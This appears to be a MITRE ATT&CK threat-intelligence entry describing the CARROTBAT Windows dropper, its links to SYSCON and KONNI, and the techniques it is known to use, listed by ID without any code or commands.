CARROTBAT

CARROTBAT is a customized dropper that has been in use since at least 2017. CARROTBAT has been used to install SYSCON and has infrastructure overlap with KONNI.[1][2]

ID: S0462
Type: MALWARE
Platforms: Windows
Version: 1.2
Created: 02 June 2020
Last Modified: 11 April 2024

Techniques Used

Domain ID Name Use
Enterprise T1059 .003 Command and Scripting Interpreter: Windows Command Shell

CARROTBAT has the ability to execute command line arguments on a compromised host.[2]

Enterprise T1070 .004 Indicator Removal: File Deletion

CARROTBAT has the ability to delete downloaded files from a compromised host.[1]

Enterprise T1105 Ingress Tool Transfer

CARROTBAT has the ability to download and execute a remote file via certutil.[1]

Enterprise T1027 .010 Obfuscated Files or Information: Command Obfuscation

CARROTBAT has the ability to execute obfuscated commands on the infected host.[1]

.013 Obfuscated Files or Information: Encrypted/Encoded File

CARROTBAT has the ability to download a base64 encoded payload.[1]

Enterprise T1082 System Information Discovery

CARROTBAT has the ability to determine the operating system of the compromised host and whether Windows is being run with x86 or x64 architecture.[1][2]

References